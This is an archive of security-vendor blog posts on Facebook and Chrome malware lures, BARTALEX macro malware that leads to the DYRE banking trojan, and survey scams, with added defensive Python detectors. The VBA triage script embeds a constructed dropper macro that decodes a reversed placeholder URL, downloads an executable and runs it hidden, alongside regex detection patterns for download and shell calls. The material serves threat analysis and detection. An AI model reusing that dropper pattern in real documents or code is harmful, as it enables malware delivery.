    Author Archive - Christopher Talampas (Fraud Analyst)

    Just how effective is it for cybercriminals to keep using Google Chrome and Facebook to infect their victims with malware?

    We’ve already seen both platforms used as parts of malicious social engineering schemes. Both Google and Facebook are aware of this and have taken steps to protect their users. The repeated appearance of malicious Chrome extensions, for example, has driven Google to restrict the use of any extension not available on the Chrome Web Store.

    Unfortunately, initiatives like these have not deterred cybercriminal efforts. Our findings also show that many of these platforms’ users still get tricked.

    Just recently, I received a message from a Facebook friend that piqued my curiosity. The message was short and to the point:

    Figure 1. Message on Facebook

    Clicking the link led us to a site with a page designed to mimic the look and feel of Facebook. The page even pretends to have content from YouTube. Visiting the malicious site led to the automatic download of a file titled Chrome_Video_installer.scr. The filename suggests that it is a harmless Chrome browser plugin required to play videos.

    Figure 2. Malicious page with the Facebook design

    This supposed video installer is detected as TROJ_KILIM.EFLD. This variant attempts to download another file, possibly the final payload, but the hosting site is currently down. It should be noted that KILIM malware are known to take the form of malicious Chrome extensions and plugins; KILIM variants have also been observed to spam Facebook messages and infect systems.

    Prominent victims

    Using feedback we gathered from the Smart Protection Network™, we decided to see which countries were the most affected by this particular attack.

    We checked the landing page and found that the Philippines had the largest number of users who visited the site, followed by Indonesia, India, Brazil, and the U.S. Strikingly, these are the same countries reported to have the highest Facebook penetration.

    Country Percentage
    Philippines 36%
    Indonesia 6%
    India 6%
    Brazil 6%
    US 5%
    Australia 3%
    Taiwan 3%
    Japan 3%
    Thailand 2%
    Qatar 2%

    Table 1. Countries with the most visits to the malicious site

    Facebook still remains the top social networking site in the world. Data from its company information page reveals that Facebook had 1.44 billion monthly active users and 1.25 billion mobile monthly active users as of March 2015. A sizeable percentage (around 83%) of users who are active on the site daily are from outside Canada and the U.S. This popularity obviously doesn’t come without pitfalls.

    The compelling elements

    In this attack, users might be fooled into clicking the link for three reasons. First, the message comes from a Facebook friend, not a stranger. Second, it addresses the user by the name they use on Facebook, which makes it look less like a random spammed message. Third, the informal tone of the message may compel the user to read it.

    The shortened link also helps disguise the lure. A suspicious-looking full URL might cause a user to reconsider clicking; a shortened link hides the real destination behind an innocent-looking address.

    The filename of the malware can also put the intended victim at ease. Extensions and plugins are part of the Chrome browser ecosystem, and a quick online search tells the user that the .SCR extension is used for screensavers, which they would not immediately think of as malicious. In reality, a .SCR file is an ordinary Windows PE executable under a different extension: double-clicking it runs the program exactly as an .EXE would.
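    The check a defender would want here is to judge a download by its content rather than its name. The following Python script is an added example, not Trend Micro’s tooling or anything from the original post: it reads the MZ/PE headers, compares them with the file extension, and flags lure words in the filename. The sample bytes and filenames are constructed for the example (only the lure filename from the post is reused); the extension and lure-word lists are assumptions, not exhaustive.

```python
"""Flag a download whose extension disguises a Windows executable.

Added example for this post, not Trend Micro's tooling. Windows treats a
.SCR "screensaver" as a normal PE executable and runs it on double-click
exactly like an .EXE. The sample bytes below are constructed; they are not
the real Chrome_Video_installer.scr sample.
"""
import struct
from pathlib import PurePath

# Extensions Windows executes directly (assumption: a short, non-exhaustive list).
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".cpl", ".bat", ".cmd", ".vbs", ".js"}

# Words that make an executable look like a harmless helper (assumption for the example).
LURE_WORDS = ("installer", "video", "chrome", "codec", "player", "update")


def is_pe(data: bytes) -> bool:
    """True if the bytes carry an MZ DOS header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify_download(filename: str, data: bytes) -> dict:
    """Judge a downloaded file by its content, not just its name."""
    ext = PurePath(filename).suffix.lower()
    pe = is_pe(data)
    reasons = []
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append(f"extension {ext} is directly executable on Windows")
    if pe:
        reasons.append("content is a PE executable (MZ/PE headers present)")
        if ext not in EXECUTABLE_EXTENSIONS:
            reasons.append("executable content hidden behind a non-executable extension")
    lowered = filename.lower()
    for word in LURE_WORDS:
        if word in lowered:
            reasons.append(f"lure word '{word}' in filename")
            break
    return {"filename": filename, "extension": ext, "is_pe": pe,
            "suspicious": bool(reasons), "reasons": reasons}


def make_fake_pe() -> bytes:
    """Construct a minimal byte string with valid MZ and PE signatures (not a runnable program)."""
    header = bytearray(b"MZ" + b"\0" * 0x3E)      # 64-byte DOS header
    struct.pack_into("<I", header, 0x3C, 0x40)    # e_lfanew -> offset 0x40
    return bytes(header) + b"PE\0\0" + b"\0" * 20


# Constructed inputs: the lure name from the post, a JPEG-looking file, and a PE renamed to .pdf.
SAMPLES = {
    "Chrome_Video_installer.scr": make_fake_pe(),
    "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\0" * 64,
    "report.pdf": make_fake_pe(),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        verdict = classify_download(name, blob)
        print(f"{name}: suspicious={verdict['suspicious']} {verdict['reasons']}")
```

    Run against a real download directory, the same logic catches both the .SCR trick and the inverse one, an executable renamed to a document extension.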

    Facing Facebook threats

    Given the popularity of Facebook, its members must be discerning about the content they come across. Never click links from unknown or unverified sites, especially if the content sounds too interesting to be true; cybercriminals often use shocking or eye-catching content to lure users to malicious websites. It is far better to click links that lead to a reputable source than to some random blog or site. The Trend Micro Site Safety Center can also be used to check whether a website is safe.

    The same applies to links or attachments sent by friends. It is worth the effort to confirm the message with the sender before clicking the link or opening the attachment.

    Facebook safety doesn’t begin and end with precautions on the website itself. Other measures like screening emails and installing a security solution can prevent malware from infecting your computers and accessing your Facebook accounts.

    We have reported this incident to Facebook. As of this publishing, Facebook has marked the message as spam.

    With additional insight from Jed Valderama.

    Hashes for related file:

    • ed263d766342df6cb87c4405441f2f547557ffd2

    Update as of June 26, 2015, 12:50 P.M. PDT (UTC-7)

    A new scam has been spotted using Facebook to spread malicious Chrome extensions. Like the previously reported threat, this one also sends a Facebook message with a link to a friend; the link redirects to a malicious site that hosts an adult video and prompts the user to download a Chrome extension.

    Should the user install the extension, Google Chrome will warn that it has the capability to perform the following routines:

    • Read and change all your data on the websites you visited
    • Capture content of your screen
    • Communicate with cooperating websites

    Further analysis of the extension reveals that its code has routines related to Facebook accounts. For example, it can get the user’s Facebook profile ID, create Facebook notes, send messages, and even “harvest” the user’s contact list.

    This extension even uses the name of a legitimate business, Antelma Business Solutions, to further convince users to install it. But the discrepancy is jarring, considering that the extension is supposed to be for managing web conferences, nothing remotely related to adult videos.

    As of this writing, we have reported this extension, detected as BREX_KILIM.VVOX, to Google. We spotted another extension in the Chrome Web Store with the same name and routines, but it is no longer available there.
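    The three warnings listed above are what Chrome derives from the extension’s manifest: broad host permissions produce the “Read and change all your data” line, the desktopCapture permission produces the screen-capture line, and an externally_connectable entry produces the “cooperating websites” line. The Python below is an added example (not Trend Micro’s code and not the extension’s own manifest) that reproduces that mapping for a constructed manifest and then flags the mismatch the post describes: a supposed conferencing tool that injects a script into facebook.com. The warning table is a trimmed subset of Chrome’s and the sample manifest, domains and names are constructed for the example.

```python
"""Map a Chrome extension manifest to the install-time warnings Chrome shows
and flag the risky combinations described above. Added example, not code from
Trend Micro or from the extension itself; SAMPLE_MANIFEST is constructed to
resemble the described behaviour and is not the BREX_KILIM.VVOX manifest.
"""
import json

WARN_ALL_SITES = "Read and change all your data on the websites you visit"
WARN_EXTERNAL = "Communicate with cooperating websites"
ALL_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Subset of Chrome's API-permission warnings (assumption: trimmed to what the example needs).
API_WARNINGS = {
    "desktopCapture": "Capture content of your screen",
    "nativeMessaging": "Communicate with cooperating native applications",
    "management": "Manage your apps, extensions, and themes",
}


def install_warnings(manifest: dict) -> list:
    """Reproduce the warning strings a user would see for this manifest."""
    perms = list(manifest.get("permissions", [])) + list(manifest.get("host_permissions", []))
    warnings = []
    if any(p in ALL_HOST_PATTERNS for p in perms):
        warnings.append(WARN_ALL_SITES)
    else:
        for host in (p for p in perms if "://" in p):
            warnings.append(f"Read and change your data on {host}")
    warnings.extend(API_WARNINGS[p] for p in perms if p in API_WARNINGS)
    if manifest.get("externally_connectable", {}).get("matches"):
        warnings.append(WARN_EXTERNAL)
    return warnings


def _domain(match_pattern: str) -> str:
    """'*://*.facebook.com/*' -> 'facebook.com' (assumption: simple match patterns only)."""
    host = match_pattern.split("://", 1)[-1].split("/", 1)[0]
    return host[2:] if host.startswith("*.") else host


def risk_flags(manifest: dict) -> list:
    """Flag permission combinations and targets that do not fit the stated purpose."""
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    flags = []
    if WARN_ALL_SITES in install_warnings(manifest) and "desktopCapture" in perms:
        flags.append("all-site access combined with screen capture")
    targets = [m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])]
    stated = (manifest.get("name", "") + " " + manifest.get("description", "")).lower()
    for domain in sorted({_domain(m) for m in targets}):
        # A content script on a site the name/description never mentions is worth a look.
        if domain.split(".")[0] not in stated:
            flags.append(f"injects a content script into {domain}, which the stated purpose never mentions")
    return flags


# Constructed manifest: conferencing branding, but facebook.com is the only site it touches.
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 2,
  "name": "Web Conference Manager",
  "description": "Manage your web conferences from the browser",
  "version": "1.0",
  "permissions": ["<all_urls>", "desktopCapture", "storage"],
  "externally_connectable": {"matches": ["*://*.conference-partner.test/*"]},
  "content_scripts": [{"matches": ["*://*.facebook.com/*"], "js": ["fb.js"]}]
}
""")

if __name__ == "__main__":
    for line in install_warnings(SAMPLE_MANIFEST):
        print("warning:", line)
    for line in risk_flags(SAMPLE_MANIFEST):
        print("flag:", line)
```

    The same functions can be pointed at the manifest.json of any unpacked extension; the warnings alone rarely stop a user, but the purpose-versus-target check is what turns the “web conference” branding into a red flag.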

    Hashes for related file:

    • F401C0ED399D79C07EC06C97BBD82E774823C6FE
    Posted in Malware, Social | Chrome Lure Used in Facebook Attack despite Google’s New Policy

    Enterprises are currently being targeted by the macro malware BARTALEX in a recent outbreak of thousands of spammed emails. The infection routine for BARTALEX uses a Microsoft Word document and social engineering lure that is widely recognized by enterprises—making infection all too possible. This attack highlights how macro malware in Microsoft Office files is fast becoming a big threat to businesses and organizations.

    BARTALEX Infection Chain

    In this attack, a colleague of mine noticed an outbreak of spammed messages all related to Automated Clearing House (ACH) fraud. ACH is a network used for electronic fund transfers in the United States; as a result it is frequently used by businesses that need to transact with other companies on a regular basis.

    ACH fraud is a typical cybercriminal hook seen in spammed emails. Instead of an attachment, the message this time bore a link to “view the full details.” Other templates used for these spammed emails involve received fax messages, parcels, invoice and billing statements, and wire transfers.

    Figure 1. Sample spammed email that leads to W2KM_BARTALEX.SMA

    By hovering over the URL we can see that it points to a Dropbox link with a file name related to the supposed ACH transaction. The URL leads to a Dropbox page that contains specific instructions and an almost convincing imitation of a Microsoft Office warning, which instructs users to enable macros.

    This malicious document is detected as W2KM_BARTALEX.SMA. As of this writing, more than a thousand similar Dropbox links were found with the same routines.

    Figure 2. A Dropbox page contains the malicious macro (click to enlarge)

    Upon enabling the macro, the malicious document downloads the banking malware TSPY_DYRE.YUYCC. This DYRE variant targets banks and financial institutions in the United States, including JP Morgan, U.S. Bank, California Bank & Trust, and Texas Capital Bank.

    Based on feedback from the Smart Protection Network, the United States is the top country affected by BARTALEX malware overall, followed by Canada and Australia. Additionally, we noticed that this attack used an old Microsoft Office 2010 logo. Given that many enterprises do not immediately upgrade to the latest Office versions, it is possible that users within enterprise organizations may fall victim to this technique.
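    The chain described above (document opened, macro enabled, payload fetched and executed) is the pattern a macro triage script looks for: an auto-executing procedure that, directly or through helpers, reaches a download routine and a process launch. The Python below is an added example, not Trend Micro’s detection logic and not the BARTALEX code; it extracts VBA procedures with a regular expression, walks direct calls from the auto-exec entry points, and scores what those procedures reach. The macro text, URL and indicator lists are constructed for the example and are assumptions, not a complete signature set.

```python
"""Heuristic triage of VBA macro source: find auto-executing procedures and
what they reach. Added example, not Trend Micro's detection logic. The macro
text below is constructed to mirror the chain the post describes (document
opened, macro enabled, payload downloaded and run); it is not W2KM_BARTALEX.SMA.
"""
import re

# One Sub/Function with its body; 'End Sub' / 'End Function' must match the opener.
PROC = re.compile(
    r"^[ \t]*(?:Private\s+|Public\s+)?(?P<kind>Sub|Function)\s+(?P<name>\w+)\s*\([^)]*\)"
    r"(?P<body>.*?)^[ \t]*End\s+(?P=kind)\b",
    re.I | re.S | re.M,
)
# Procedure names Office runs automatically (assumption: a common subset).
AUTOEXEC = re.compile(r"(AutoOpen|Document_Open|AutoExec|Workbook_Open|AutoClose|Document_Close)", re.I)
DOWNLOAD = re.compile(r"\b(URLDownloadToFile|MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)\b", re.I)
EXECUTE = re.compile(r"\b(Shell|ShellExecute|Exec|Run)\b", re.I)
OBFUSCATION = re.compile(r"\b(Chr|ChrW|StrReverse|Xor)\s*\(", re.I)


def triage_vba(source: str) -> dict:
    """Return entry points, the procedures reachable from them, indicators and a verdict."""
    procs = {m.group("name"): m.group("body") for m in PROC.finditer(source)}
    entry_points = [n for n in procs if AUTOEXEC.fullmatch(n)]
    # Walk direct calls from the auto-exec entry points so indirection through helpers is not missed.
    reachable, stack = [], list(entry_points)
    while stack:
        name = stack.pop()
        if name in reachable:
            continue
        reachable.append(name)
        for other in procs:
            if other != name and re.search(rf"\b{re.escape(other)}\b", procs[name]):
                stack.append(other)
    reached = "\n".join(procs[n] for n in reachable)
    indicators = {
        "download": sorted({h.lower() for h in DOWNLOAD.findall(reached)}),
        "execute": sorted({h.lower() for h in EXECUTE.findall(reached)}),
        "obfuscation_calls": len(OBFUSCATION.findall(reached)),
    }
    if entry_points and indicators["download"] and indicators["execute"]:
        verdict = "high"       # auto-exec + download + launch: the dropper pattern
    elif entry_points and (indicators["download"] or indicators["execute"] or indicators["obfuscation_calls"]):
        verdict = "medium"
    else:
        verdict = "low"
    return {"entry_points": entry_points, "reachable": reachable,
            "indicators": indicators, "verdict": verdict}


# Constructed sample: AutoOpen only calls a helper; the helper does the download and launch.
MALICIOUS_MACRO = r'''
Sub AutoOpen()
    Fetch
End Sub

Private Sub Fetch()
    Dim url As String, target As String
    url = StrReverse("exe.etadpu/tset.elpmaxe//:ptth")
    target = Environ("TEMP") & "\update.exe"
    URLDownloadToFile 0, url, target, 0, 0
    Shell target, vbHide
End Sub

Sub Unused()
    MsgBox "not called from any entry point"
End Sub
'''

# Constructed benign sample for contrast.
BENIGN_MACRO = r'''
Sub FormatReport()
    Selection.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage_vba(src))
```

    The call walk matters because real droppers rarely put the download in AutoOpen itself; scoring only the entry point body would miss the sample above entirely.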

    Figure 3. W2KM_BARTALEX infection count over the last three months

    Malware Improvements

    This latest observation is but another development for both BARTALEX and DYRE. We previously reported on BARTALEX malware that were attached to spammed emails.

    In January this year, we wrote about improved DYRE infection techniques. These techniques involve hijacking Microsoft Outlook to spread UPATRE, which then downloads the data-stealing malware ZeuS and ransomware.

    Dropbox not new to malicious activity

    This isn’t the first time that Dropbox has been reported to be involved in malicious activity. Dropbox and other cloud-based services are known to host malware and cybercriminals’ C&C software, but this is the first time we’re seeing Dropbox used to host macro-based malware, a category that is rapidly increasing despite being considered a thing of the past.

    We have already contacted Dropbox about the more than a thousand links hosted on their site.

    Macro malware still in the picture

    Macro malware like BARTALEX is seemingly more prominent than ever, an indicator that old threats are still effective infection vectors on today’s systems. And they seem to be adapting: they are now hosted on legitimate services like Dropbox, and with the recent outbreak, macro malware may continue to threaten more businesses in the future.

    Addressing macro malware in an enterprise (and small and medium-sized business) setting involves reevaluating and revisiting existing security policies. It’s also advisable to decrease the attack surface by making sure systems within the corporation have the necessary security measures in place: for instance, it may be wise to disable Windows Script Host on users’ systems if it serves no substantial purpose, and to enforce Office’s Trust Center macro settings through Group Policy (disabling macros without notification where they are not needed, or allowing only digitally signed macros) so that a convincing-looking prompt cannot talk the user into enabling them. Lastly, user education will go a long way in defending against these types of threats, in particular those that exploit human error, e.g., enabling malicious macros in Word documents.

    The hashes of the files detected as W2KM_BARTALEX.SMA are:

    • 61a7cc6ed45657fa1330e922aea33254b189ef61
    • 6f252485dee0b854f72cc8b64601f6f19d01c02c
    • 85e10382b06801770a4477505ed5d8c75fb37135

    The hash of the file detected as TSPY_DYRE.YUYCC is:

    • 5e392950fa295a98219e1fc9cce7a7048792845e

    The hashes of the malicious Microsoft Office documents are:

    • 037cebf49a412bcabd7d3b896382af53eaecabed
    • 0b4100e124507a174f147c3bf0121769ab209104
    • 0fad05ba34d91de15047052c4a6166d92aa5e3ac
    • 1363b79fc25467ea01842c5cbfa90c90bd7e7790
    • 164929155ab6f78a3ff46753b0a321e8dbd13e8a
    • 18df8417fce6f9e24c8369a2897eaf29b1ec11c4
    • 21bc3485810e258b425e4b38e46d944f7be81c50
    • 23f9777f17f86c9c8cbf25672e2e783ab0acc58c
    • 25cbbcc94782b2f1efd46179f28c517af44637fb
    • 29e4f4013c07dfcb0aae20c806b157ed7f023e9c
    • 2b01eb798d31d91cc03221b82c3f3fe04f4eb40a
    • 2b8c9af6d0c372f3343ae76e26d48f8c9eed37c7
    • 31dcc204661eee13920fda7ec582aaa1ec48f821
    • 31e2a2152a974f69e98c235c0dd3cddc1984b8da
    • 3338db3553bc2ef8b7587f5b331c2a3ecbbbcd6c
    • 339543194c2e64c27d746572d235dba37a332eeb
    • 33c73dfd66f9fb0e8bc30b53b150e202e7fc3055
    • 350a922a008078c6fdbee9f566363f553ea55394
    • 3916a8150fa10d4b4999f6bd97b7e7464bea13d1
    • 3cdde0489afab5c5fd9098c408c7419b44d2bc46

    Additional analysis by Cris Pantanilla, Francis Antazo, Jay Yaneza, and Maydalene Salvador

    Update as of May 1, 2015, 11:00 PM (GMT+8)
    The list above has been modified to indicate the hashes of the malicious Microsoft Office documents instead of HTML files as previously listed.


    While gamers from North America and Europe are still waiting for the release of Diablo III this coming Tuesday (May 15), cybercriminals have already gone ahead and started taking advantage.

    We found a search result for the string “diablo 3 free download” leading to a survey scam — a scheme frequently seen deployed through Facebook.

    The search result below (highlighted in yellow) directs to a page which appears to be the download page for Diablo III:

    However, clicking the download button only leads to the following survey page:

    Another result, one supposedly leading to a YouTube page (highlighted in red in Figure 1), leads to the following page:

    Entering the site, the visitor is met with instructions that they need to follow in order to be able to download the beta version of Diablo III. Interestingly, the steps involve sharing a link through Facebook three times — once on the users’ wall and twice on game pages.

    Of course, following the instructions does not really lead to a file download, only to yet another survey page:

    As enticing as it is to be able to download a very popular game right before everyone else does, users should keep in mind that such shady offers are widely used as bait by cybercriminals.

    Diablo 3 is not the first game used by cybercriminals for such schemes; we’ve seen other popular games such as World of Warcraft and Grand Theft Auto used in the past.

    Trend Micro users are protected from the schemes reported above through the Trend Micro™ Smart Protection Network™.


    Scammers have snatched up the opportunity to victimize people by leveraging the interest and anticipation over the upcoming release of iPad 3. Just days before its supposed launch, we have noted several posts on Facebook that claim to give away free iPad 3s to some “lucky” users.

    Unlike the previous Facebook threats we’ve blogged about recently, this one does not involve clickjacking. Some users may have intentionally posted this link on their social media accounts like Facebook to increase their referrer points and improve their chances of “winning” these items. Once users visit the site and click the image, it loads the following page:


    News of Whitney Houston’s sudden demise spread like wildfire on the Internet. Countless tweets, Facebook wall posts, and news items circulated regarding the singer’s death at age 48. Given the massive attention around Houston’s death, cybercriminals were quick to take advantage of this unfortunate incident.

    We have uncovered two web threats shortly after the news broke. One was a clickjacking attack found on Facebook, while the other one was a link circulating on Twitter.

    RIP “Whitney Houston” leads to Clickjacking

    My colleague Karla Agregado found a fake video spreading on Facebook. Wall posts with the subject “I Cried watching this video. RIP Whitney Houston” come with a link to the supposed video. Clicking it leads users to a Facebook page that contains a link to the video. However, clicking this link only leads through several redirections until users are led to the usual survey scam site.

    Upon further investigation of the domains involved in the redirections, we also found 101 more survey scams hosted on the same IP address as those domains.

    RIP Whitney Tweets May Lead To Web Threat

    We also found Tweets with malicious links that took advantage of the RIP Whitney Houston tag, which was trending worldwide on Twitter.

    The said Tweets contain a link to a particular blog dedicated to the late singer. Users who view the page are automatically redirected to another website. The succeeding page is a site that supposedly features several Whitney Houston wallpapers. Once users decide to download a wallpaper from that site, a pop-up window appears and asks users to download some Whitney Houston ringtones.




    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice